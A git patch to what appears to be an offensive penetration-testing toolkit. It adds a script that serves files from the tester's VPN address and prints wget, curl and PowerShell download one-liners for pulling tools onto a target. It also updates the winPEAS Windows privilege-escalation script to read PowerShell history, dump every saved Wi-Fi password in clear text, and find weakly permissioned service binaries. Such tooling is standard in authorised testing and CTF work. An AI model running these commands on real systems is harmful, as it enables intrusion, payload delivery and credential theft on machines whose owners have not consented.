From eb9e62b70f664794491ae4fa285c21cf98035177 Mon Sep 17 00:00:00 2001 From: Roman Hergenreder Date: Thu, 1 Oct 2020 22:39:39 +0200 Subject: [PATCH] winPEAS update --- startHttpServer.sh | 9 +++++++++ win/winPEAS.bat | 7 ++++--- 2 files changed, 13 insertions(+), 3 deletions(-) create mode 100755 startHttpServer.sh diff --git a/startHttpServer.sh b/startHttpServer.sh new file mode 100755 index 0000000..21aed28 --- /dev/null +++ b/startHttpServer.sh @@ -0,0 +1,9 @@ +#!/usr/bin/bash + +ipAddress=$(ip a show dev tun0 | grep inet | awk '{print $2'} | cut -d'/' -f1 | head -n 1) +echo "wget http://${ipAddress}/" +echo "curl http://${ipAddress}/" +echo "(New-Object System.Net.WebClient).DownloadFile('http://${ipAddress}/', 'C:\\Temp\\')" + +echo "" +sudo python -m http.server 80 diff --git a/win/winPEAS.bat b/win/winPEAS.bat index e1f39a1..86b2086 100644 --- a/win/winPEAS.bat +++ b/win/winPEAS.bat @@ -165,6 +165,8 @@ echo. echo PS default transcript history dir %SystemDrive%\transcripts\ echo. +echo Checking PS history file +dir "%APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" echo. echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] MOUNTED DISKS ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- echo [i] Maybe you find something interesting @@ -278,8 +280,7 @@ ipconfig /displaydns | findstr "Record" | findstr "Name Host" echo. echo. echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] WIFI ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- -echo [i] To get the clear-text password use: netsh wlan show profile key=clear -netsh wlan show profile +for /f "tokens=4 delims=: " %%a in ('netsh wlan show profiles ^| find "Profile "') do (netsh wlan show profiles name=%%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) echo. echo. echo. @@ -359,7 +360,7 @@ echo [i] The permissions are also checked and filtered using icacls echo [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services for /f "tokens=2" %%n in ('sc query state^= all^| findstr SERVICE_NAME') do ( for /f "delims=: tokens=1*" %%r in ('sc qc "%%~n" ^| findstr BINARY_PATH_NAME ^| findstr /i /v /l /c:"c:\windows\system32" ^| findstr /v /c:""""') do ( - echo %%~s | findstr /r /c:"[a-Z][ ][a-Z]" >nul 2>&1 && (echo %%n && echo %%~s && icacls %%s | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%") && echo. + echo %%~s ^| findstr /r /c:"[a-Z][ ][a-Z]" >nul 2>&1 && (echo %%n && echo %%~s && icacls %%s | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%") && echo. ) ) ::wmic service get name,displayname,pathname,startmode | more | findstr /i /v "C:\\Windows\\system32\\" | findstr /i /v """